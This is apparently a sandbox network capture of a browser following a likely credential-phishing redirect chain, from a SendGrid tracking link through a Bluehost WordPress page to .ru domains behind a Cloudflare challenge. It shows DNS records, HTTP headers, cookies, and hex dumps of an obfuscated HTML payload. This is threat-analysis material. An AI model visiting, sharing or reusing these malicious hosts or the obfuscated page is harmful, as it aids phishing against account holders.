                                                            Jan 6, 2025 16:54:09.794775963 CET1.1.1.1192.168.2.40x785fNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:09.795866966 CET1.1.1.1192.168.2.40xd71eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:09.795866966 CET1.1.1.1192.168.2.40xd71eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            • u1427642.ct.sendgrid.net
                                                            • xre.wzr.mybluehostin.me
                                                            • https:
                                                              • gimd.lamantatio.ru
                                                              • challenges.cloudflare.com
                                                              • code.jquery.com
                                                              • cdnjs.cloudflare.com
                                                              • xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru
                                                            • a.nel.cloudflare.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449740167.89.118.234433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:29 UTC863OUTGET /ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8 HTTP/1.1
                                                            Host: u1427642.ct.sendgrid.net
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:30 UTC263INHTTP/1.1 302 Found
                                                            Server: nginx
                                                            Date: Mon, 06 Jan 2025 15:53:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 88
                                                            Connection: close
                                                            Location: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsn
                                                            X-Robots-Tag: noindex, nofollow
                                                            2025-01-06 15:53:30 UTC88INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 78 72 65 2e 77 7a 72 2e 6d 79 62 6c 75 65 68 6f 73 74 69 6e 2e 6d 65 2f 77 70 2f 30 30 78 33 37 36 6e 34 33 6a 64 38 33 34 34 39 64 68 6e 39 33 38 33 38 30 2d 32 6a 73 6e 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                            Data Ascii: <a href="https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsn">Found</a>.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449743162.214.80.734433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:30 UTC699OUTGET /wp/00x376n43jd83449dhn938380-2jsn HTTP/1.1
                                                            Host: xre.wzr.mybluehostin.me
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:31 UTC790INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:31 GMT
                                                            Server: nginx/1.25.5
                                                            Content-Type: text/html
                                                            Content-Length: 351772
                                                            X-Frame-Options: SAMEORIGIN
                                                            Last-Modified: Sun, 05 Jan 2025 18:04:54 GMT
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=2592000
                                                            Expires: Wed, 05 Feb 2025 15:53:31 GMT
                                                            Vary: Accept-Encoding,User-Agent
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                            Permissions-Policy: geolocation=self
                                                            Content-Security-Policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'
                                                            X-Permitted-Cross-Domain-Policies: none
                                                            Feature-Policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                            X-Server-Cache: true
                                                            X-Proxy-Cache: MISS
                                                            2025-01-06 15:53:31 UTC7402INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inli
                                                            2025-01-06 15:53:31 UTC8151INData Raw: 73 56 70 6e 6d 4f 52 79 61 74 55 6b 38 35 66 33 4d 45 48 4e 4b 68 39 7a 55 42 70 32 44 67 34 68 66 62 37 63 31 74 50 4b 56 49 51 33 30 57 57 79 61 44 58 4a 47 55 6f 76 51 52 41 50 6a 63 42 6f 2f 52 78 37 4a 5a 43 52 43 31 63 51 66 46 74 64 4a 65 59 46 4e 6f 33 79 4e 2f 56 4e 68 37 4b 52 73 34 57 7a 71 74 36 54 53 38 73 34 35 35 6c 78 72 76 2f 4c 51 70 63 32 76 52 46 58 72 4f 41 5a 6a 62 4e 51 78 6a 59 77 71 50 73 56 6d 64 32 43 38 53 58 4f 37 45 2b 37 69 61 70 7a 70 42 4d 44 79 72 41 78 52 35 35 44 39 67 79 6e 4a 36 55 70 2f 46 64 52 6e 65 39 77 30 4c 61 66 4e 35 6e 63 54 41 62 36 54 72 75 4d 4b 46 74 68 6c 64 75 52 49 2f 46 43 68 37 50 63 31 44 6b 2b 4e 62 50 35 38 51 53 65 6a 59 34 48 6f 57 4b 75 65 6d 31 63 79 74 4d 50 49 37 39 61 51 68 2b 53 67 4a 46
                                                            Data Ascii: sVpnmORyatUk85f3MEHNKh9zUBp2Dg4hfb7c1tPKVIQ30WWyaDXJGUovQRAPjcBo/Rx7JZCRC1cQfFtdJeYFNo3yN/VNh7KRs4Wzqt6TS8s455lxrv/LQpc2vRFXrOAZjbNQxjYwqPsVmd2C8SXO7E+7iapzpBMDyrAxR55D9gynJ6Up/FdRne9w0LafN5ncTAb6TruMKFthlduRI/FCh7Pc1Dk+NbP58QSejY4HoWKuem1cytMPI79aQh+SgJF
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 72 76 76 39 39 36 75 6a 51 44 4b 6c 4f 79 72 5a 57 6f 4b 65 48 57 58 73 2b 44 7a 34 4c 4f 63 78 61 6e 47 75 46 39 54 41 50 4f 77 44 6c 73 31 42 6d 53 4d 43 65 32 6f 2f 6a 64 2b 41 30 41 61 4f 46 63 38 71 31 4d 50 78 73 35 41 7a 52 61 6e 39 4b 69 67 4e 76 32 6d 77 4c 66 35 32 74 49 45 4d 79 2f 37 6e 63 58 76 4a 6a 4b 55 79 37 32 55 33 6e 2f 68 2f 63 79 78 38 4d 79 55 63 45 57 4e 35 33 4f 63 4c 35 2f 70 43 70 74 55 6e 6e 31 54 62 72 6c 45 73 55 65 64 61 70 74 76 45 4a 5a 67 6d 78 49 49 43 72 54 46 6b 53 31 66 69 77 77 5a 51 61 52 59 78 76 63 4c 56 72 6c 75 53 4e 59 41 34 79 44 56 54 6f 38 68 4b 6e 4e 70 42 2f 43 75 69 41 35 77 5a 4a 35 56 4c 68 38 68 68 77 48 63 70 42 6e 69 57 2b 71 2b 76 64 73 4a 54 46 46 71 30 77 4e 36 61 78 6b 66 70 77 4b 43 4c 56 61 66
                                                            Data Ascii: rvv996ujQDKlOyrZWoKeHWXs+Dz4LOcxanGuF9TAPOwDls1BmSMCe2o/jd+A0AaOFc8q1MPxs5AzRan9KigNv2mwLf52tIEMy/7ncXvJjKUy72U3n/h/cyx8MyUcEWN53OcL5/pCptUnn1TbrlEsUedaptvEJZgmxIICrTFkS1fiwwZQaRYxvcLVrluSNYA4yDVTo8hKnNpB/CuiA5wZJ5VLh8hhwHcpBniW+q+vdsJTFFq0wN6axkfpwKCLVaf
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 7a 52 67 45 45 59 47 69 39 75 76 32 38 67 4b 78 2b 30 54 63 79 39 75 2b 37 57 43 34 57 6b 2f 67 53 6c 35 72 78 47 37 55 7a 6e 64 48 79 30 32 39 53 50 37 36 58 69 6f 49 73 39 32 72 4a 49 51 37 6c 6d 56 37 46 39 42 77 51 74 45 33 62 63 79 39 6a 69 69 6b 59 30 75 38 78 45 43 4d 69 77 73 76 62 48 42 30 6f 34 4d 4f 66 68 73 2b 4a 34 70 56 4d 35 46 4f 67 43 42 58 6b 62 31 71 30 6b 37 6d 77 45 57 44 2f 36 51 2f 64 6c 33 68 31 57 52 31 78 71 54 64 50 4e 62 57 50 6c 45 78 65 5a 78 46 69 69 78 4f 30 46 4d 57 33 67 66 68 32 41 70 76 2b 68 37 6b 63 61 62 50 38 54 79 5a 50 45 30 52 76 73 6a 59 4d 67 73 59 55 31 32 73 4f 49 48 58 50 2b 56 72 6c 45 4c 53 51 79 4c 30 64 61 4b 55 71 35 31 77 49 70 2f 72 42 54 69 59 41 2b 51 4b 4a 79 46 49 59 73 62 61 54 6e 2b 6f 35 76 69
                                                            Data Ascii: zRgEEYGi9uv28gKx+0Tcy9u+7WC4Wk/gSl5rxG7UzndHy029SP76XioIs92rJIQ7lmV7F9BwQtE3bcy9jiikY0u8xECMiwsvbHB0o4MOfhs+J4pVM5FOgCBXkb1q0k7mwEWD/6Q/dl3h1WR1xqTdPNbWPlExeZxFiixO0FMW3gfh2Apv+h7kcabP8TyZPE0RvsjYMgsYU12sOIHXP+VrlELSQyL0daKUq51wIp/rBTiYA+QKJyFIYsbaTn+o5vi
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 58 77 77 52 41 6d 6a 63 42 54 51 4e 55 69 71 46 66 6c 50 42 6d 41 47 42 59 38 65 78 47 6f 4d 30 59 43 51 57 42 36 36 77 46 62 52 75 33 5a 77 76 4d 57 53 33 71 73 68 32 54 65 7a 71 48 65 67 71 39 35 6e 59 74 63 70 38 54 74 51 5a 4a 37 49 74 62 6b 2f 4c 59 33 52 63 41 4a 72 30 5a 54 72 7a 45 79 78 4a 46 5a 37 7a 61 39 47 45 35 7a 6e 65 2b 58 58 42 47 44 6a 58 33 68 5a 39 45 46 70 61 4f 77 39 66 6c 4a 51 58 68 38 48 34 50 34 64 4a 63 38 66 41 7a 70 4d 64 4a 6c 36 47 31 44 6a 67 4d 5a 59 44 67 4c 54 62 4e 71 6d 38 66 35 56 73 52 74 70 47 63 58 45 4a 43 65 76 4b 61 77 51 67 50 33 4f 58 63 6d 50 52 36 76 4a 6f 62 43 73 4c 61 6e 63 34 45 46 44 35 58 6d 48 59 73 6b 4e 6f 7a 48 63 63 4f 45 30 76 30 58 46 37 57 6f 79 61 36 54 42 70 57 74 68 57 4b 67 6a 44 48 6c 6a
                                                            Data Ascii: XwwRAmjcBTQNUiqFflPBmAGBY8exGoM0YCQWB66wFbRu3ZwvMWS3qsh2TezqHegq95nYtcp8TtQZJ7Itbk/LY3RcAJr0ZTrzEyxJFZ7za9GE5zne+XXBGDjX3hZ9EFpaOw9flJQXh8H4P4dJc8fAzpMdJl6G1DjgMZYDgLTbNqm8f5VsRtpGcXEJCevKawQgP3OXcmPR6vJobCsLanc4EFD5XmHYskNozHccOE0v0XF7Woya6TBpWthWKgjDHlj
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 53 35 77 43 79 33 57 58 6f 68 31 33 6e 47 6e 31 37 76 4e 65 54 2f 4f 31 6a 64 79 2f 2b 75 55 64 4c 51 6c 4d 64 64 70 65 45 47 66 61 47 4f 47 59 46 72 76 6a 6e 65 34 7a 55 58 61 65 65 2b 56 75 45 32 4f 77 7a 35 34 43 76 67 5a 70 4b 45 7a 4d 4b 47 64 4d 30 52 51 73 62 47 68 65 48 39 2b 74 47 50 33 6e 37 36 50 64 76 6d 4f 52 59 32 48 32 62 4b 36 42 77 62 67 34 69 68 47 6d 38 41 4a 37 59 78 4b 75 43 34 36 64 48 79 75 2b 79 55 41 4c 75 61 6d 62 42 53 66 48 49 6e 39 64 58 4c 7a 34 57 4d 68 2f 35 35 39 62 47 2b 55 59 58 51 62 64 44 73 35 6b 4a 65 4e 34 50 68 62 63 6a 72 59 61 4b 6e 50 48 4e 71 54 4b 62 57 31 58 6f 5a 35 75 64 4d 39 72 45 47 75 65 73 41 48 76 72 6d 38 4b 76 43 6b 77 4b 61 42 68 66 2b 77 44 68 72 58 4e 70 46 48 47 77 48 71 33 4b 78 55 70 5a 76 2f
                                                            Data Ascii: S5wCy3WXoh13nGn17vNeT/O1jdy/+uUdLQlMddpeEGfaGOGYFrvjne4zUXaee+VuE2Owz54CvgZpKEzMKGdM0RQsbGheH9+tGP3n76PdvmORY2H2bK6Bwbg4ihGm8AJ7YxKuC46dHyu+yUALuambBSfHIn9dXLz4WMh/559bG+UYXQbdDs5kJeN4PhbcjrYaKnPHNqTKbW1XoZ5udM9rEGuesAHvrm8KvCkwKaBhf+wDhrXNpFHGwHq3KxUpZv/
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 64 36 44 50 33 48 37 47 6a 62 2b 63 59 37 58 43 52 62 32 47 66 52 5a 72 49 37 4e 78 79 65 33 52 68 68 48 34 6f 45 2f 64 67 73 65 65 6a 4c 63 41 44 63 30 34 44 68 6a 48 4d 67 37 38 38 31 2b 35 2b 63 46 4a 4b 54 51 6c 30 32 61 35 37 53 54 33 6d 71 2f 64 61 30 50 4e 35 59 32 65 54 4f 50 63 44 36 45 67 68 50 32 67 7a 57 6e 37 52 54 72 32 43 55 5a 54 53 33 4f 41 51 67 76 48 65 76 38 2f 65 32 2b 36 4e 4c 75 53 49 34 6e 31 72 58 6e 2f 31 39 4d 66 79 53 53 7a 4d 59 30 30 30 39 50 62 36 48 39 58 4b 52 6d 41 41 2b 34 41 49 73 6a 4d 63 2b 35 57 6c 61 66 37 56 6a 4b 44 77 53 41 57 78 78 49 41 6d 64 2f 2f 39 6e 2f 38 33 34 56 48 34 33 49 71 59 76 4d 6d 4d 75 66 34 45 36 46 52 73 42 34 45 55 32 51 52 35 55 73 42 6a 57 38 4d 53 37 45 79 6e 30 62 45 2b 53 55 42 45 38 53
                                                            Data Ascii: d6DP3H7Gjb+cY7XCRb2GfRZrI7Nxye3RhhH4oE/dgseejLcADc04DhjHMg7881+5+cFJKTQl02a57ST3mq/da0PN5Y2eTOPcD6EghP2gzWn7RTr2CUZTS3OAQgvHev8/e2+6NLuSI4n1rXn/19MfySSzMY0009Pb6H9XKRmAA+4AIsjMc+5Wlaf7VjKDwSAWxxIAmd//9n/834VH43IqYvMmMuf4E6FRsB4EU2QR5UsBjW8MS7Eyn0bE+SUBE8S
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 78 6d 61 6e 34 6c 44 54 73 56 38 4c 54 77 71 38 32 48 63 4f 5a 55 6c 49 30 7a 63 38 30 73 55 50 75 72 45 73 6b 38 49 2f 76 32 6e 55 6d 6a 69 6b 63 35 45 4e 59 34 46 70 58 6e 53 6d 4b 39 34 39 67 62 33 48 2b 71 59 4a 57 65 53 43 55 45 48 78 79 77 51 69 66 69 35 39 56 76 6f 38 34 4d 45 2f 42 36 79 48 62 34 43 66 4c 42 68 5a 55 72 31 4c 6c 67 63 39 5a 76 42 53 4f 77 39 5a 44 4c 67 78 74 61 66 74 7a 4c 67 41 46 69 41 4e 38 76 30 62 51 69 74 6d 6c 6e 75 35 34 38 6c 76 41 31 6d 79 4b 57 35 39 44 6d 51 49 48 45 35 34 50 49 7a 68 48 6d 4e 7a 69 41 6b 6f 47 4c 7a 44 58 54 38 2f 34 45 35 30 6d 4a 61 6f 7a 59 71 39 58 53 37 57 44 5a 51 69 57 35 61 66 48 74 73 38 74 6c 6b 35 6e 75 78 32 67 31 2b 37 71 39 37 58 44 63 53 6c 52 68 67 35 32 61 76 6a 62 2f 38 6d 52 63 31
                                                            Data Ascii: xman4lDTsV8LTwq82HcOZUlI0zc80sUPurEsk8I/v2nUmjikc5ENY4FpXnSmK949gb3H+qYJWeSCUEHxywQifi59Vvo84ME/B6yHb4CfLBhZUr1Llgc9ZvBSOw9ZDLgxtaftzLgAFiAN8v0bQitmlnu548lvA1myKW59DmQIHE54PIzhHmNziAkoGLzDXT8/4E50mJaozYq9XS7WDZQiW5afHts8tlk5nux2g1+7q97XDcSlRhg52avjb/8mRc1
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 55 72 70 72 55 75 7a 50 5a 2f 30 76 64 79 55 39 4a 34 77 52 32 6a 74 69 72 34 70 7a 32 47 76 6f 39 2b 52 4d 38 2b 6d 7a 6a 69 65 34 38 78 67 33 49 6d 53 6c 31 78 64 35 61 36 4c 59 52 47 76 4d 2b 4d 57 79 4f 36 55 46 33 30 50 69 68 74 64 61 32 75 43 63 4d 2b 53 35 65 61 6a 4f 77 57 6c 4c 61 48 34 4a 75 45 59 54 4b 41 53 63 56 50 4d 51 56 55 76 57 61 73 30 32 74 34 32 4b 55 67 64 66 31 78 34 51 65 39 31 30 6e 55 2f 47 5a 66 36 78 48 72 6a 66 6a 7a 78 77 67 55 48 55 4e 58 65 37 6b 75 69 6a 79 74 33 6f 48 76 45 65 31 2f 55 38 66 32 4b 70 33 70 38 61 46 55 41 64 76 7a 6c 68 53 4f 56 4e 6f 52 32 58 35 6b 55 55 37 4d 75 54 6f 71 62 53 58 73 74 6c 50 62 47 44 78 50 48 36 42 41 72 50 7a 59 6f 69 47 74 7a 52 52 63 32 4e 42 41 4d 49 76 77 6c 53 47 78 66 36 39 6b 51
                                                            Data Ascii: UrprUuzPZ/0vdyU9J4wR2jtir4pz2Gvo9+RM8+mzjie48xg3ImSl1xd5a6LYRGvM+MWyO6UF30Pihtda2uCcM+S5eajOwWlLaH4JuEYTKAScVPMQVUvWas02t42KUgdf1x4Qe910nU/GZf6xHrjfjzxwgUHUNXe7kuijyt3oHvEe1/U8f2Kp3p8aFUAdvzlhSOVNoR2X5kUU7MuToqbSXstlPbGDxPH6BArPzYoiGtzRRc2NBAMIvwlSGxf69kQ
                                                            2025-01-06 15:53:31 UTC8192INData Raw: 2b 68 51 52 6f 71 49 69 71 76 62 4e 51 52 72 34 34 32 76 4d 2b 74 4d 58 31 48 42 66 5a 63 65 46 48 44 34 58 6e 4a 53 4e 37 39 53 38 57 4a 49 36 79 34 73 30 75 45 64 69 36 71 69 68 6e 70 30 62 72 4f 59 48 47 68 58 4e 74 31 64 72 47 52 53 2f 39 53 57 63 41 47 41 64 59 6f 41 54 69 7a 73 37 59 70 38 70 63 79 76 65 54 73 56 4f 59 32 35 64 62 6d 4c 62 79 37 57 65 6a 33 74 36 48 4c 4c 76 64 76 32 73 74 39 4a 59 32 55 39 55 31 6a 50 73 46 70 46 55 4c 46 65 4a 56 57 52 30 2f 4c 4a 75 32 52 36 56 4e 49 37 44 65 51 2f 7a 44 4a 58 54 49 6a 38 68 59 56 38 67 76 74 50 31 76 61 68 6d 47 74 75 36 6c 5a 36 4e 79 46 52 79 50 79 75 75 33 48 43 35 75 63 33 78 37 69 50 51 37 75 4f 58 55 70 4c 4a 4e 59 38 2f 57 32 57 4f 79 61 63 4e 39 75 6b 70 51 37 6e 2f 47 30 32 4b 61 32 71
                                                            Data Ascii: +hQRoqIiqvbNQRr442vM+tMX1HBfZceFHD4XnJSN79S8WJI6y4s0uEdi6qihnp0brOYHGhXNt1drGRS/9SWcAGAdYoATizs7Yp8pcyveTsVOY25dbmLby7Wej3t6HLLvdv2st9JY2U9U1jPsFpFULFeJVWR0/LJu2R6VNI7DeQ/zDJXTIj8hYV8gvtP1vahmGtu6lZ6NyFRyPyuu3HC5uc3x7iPQ7uOXUpLJNY8/W2WOyacN9ukpQ7n/G02Ka2q
                                                            2025-01-06 15:53:31 UTC635OUTGET /favicon.ico HTTP/1.1
                                                            Host: xre.wzr.mybluehostin.me
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsn
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:32 UTC466INHTTP/1.1 404 Not Found
                                                            Date: Mon, 06 Jan 2025 15:53:31 GMT
                                                            Server: nginx/1.25.5
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Content-Length: 315
                                                            <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
                                                            <html><head>
                                                            <title>404 Not Found</title>
                                                            </head><body>
                                                            <h1>Not Found</h1>
                                                            <p>The requested URL was not found on this server.</p>
                                                            <p>Additionally, a 404 Not Found
                                                            error was encountered while trying to use an ErrorDocument to handle the request.</p>
                                                            </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449754104.21.32.14433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:46 UTC715OUTGET /ZSei/ HTTP/1.1
                                                            Host: gimd.lamantatio.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Referer: https://xre.wzr.mybluehostin.me/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:47 UTC1248INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kDok%2Fzg57iuoQsPYBEBB7108MIkJ4%2FWBxOt5h0it5kl2qWvG%2F4Qx9KVodFp89yVlh0xrUZ2avxBRo1Ol%2BFqWHmVFU2a%2BMsuDF1B1sr%2BT9Dl8gsSTyZcOP6r9CTlH4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1038&min_rtt=1035&rtt_var=298&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1624&delivery_rate=2674178&cwnd=251&unsent_bytes=0&cid=c2f2843c687f5bec&ts=247&x=0"
                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImpxTVJPTzNTN2hiYzRLdXVvaEsyakE9PSIsInZhbHVlIjoiTmhjQ0RaL0hVSVdBTG9zRTc2Z2M2T2UzdFVqcWxKdUIwWWZqYzFqY29OSUNEcjltOEwyQ2FtdzkrR0ZERjFQc0toSlN1eWoyODhvdTlXWEkybkNHeFB4Ny92QnM0UHNSWEZaZEg2M05MQTgvQWxrUDdTejg1RFFWWjU3WDJMRXIiLCJtYWMiOiJmZDRlMTU4OTI1MzEzYmE5MjYzMWFjYTFhOWRkYTYyNTgwMzA3NTM1ZTE1YTUxMmRhMjQ0NzczY2Y2ZDRlOGU2IiwidGFnIjoiIn0%3D; expires=Mon, 06-Jan-2025 17:53:46 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                            2025-01-06 15:53:47 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 64 6f 4d 44 59 34 4d 32 46 4c 65 57 68 7a 4d 57 70 31 56 6c 56 57 64 31 4e 70 51 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 48 64 54 57 56 6f 33 51 57 68 32 57 45 5a 57 4e 6a 42 70 63 6d 73 78 4d 6e 4e 44 4d 6d 56 71 61 57 4d 32 55 57 52 48 64 6d 68 49 54 31 5a 4e 4f 57 35 54 4f 58 4a 48 4d 31 42 57 5a 6c 46 73 59 6e 5a 57 4e 6b 64 72 62 44 6b 7a 4e 6a 4a 73 65 55 39 36 64 57 39 53 4e 47 70 70 56 45 56 76 56 30 68 42 55 56 56 4b 4d 45 4a 52 53 55 70 36 63 6c 46 30 55 57 5a 4b 63 45 31 6a 4e 30 39 76 4c 30 6b 30 4c 79 39 6b 52 6c 49 32 62 47 77 34 59 33 4a 61 4d 45 67 76 61 69 74 61 4e 57 46 51 57 6b 39 56 4e 30 56 32 59 6d 55
                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImdoMDY4M2FLeWhzMWp1VlVWd1NpQUE9PSIsInZhbHVlIjoiVHdTWVo3QWh2WEZWNjBpcmsxMnNDMmVqaWM2UWRHdmhIT1ZNOW5TOXJHM1BWZlFsYnZWNkdrbDkzNjJseU96dW9SNGppVEVvV0hBUVVKMEJRSUp6clF0UWZKcE1jN09vL0k0Ly9kRlI2bGw4Y3JaMEgvaitaNWFQWk9VN0V2YmU
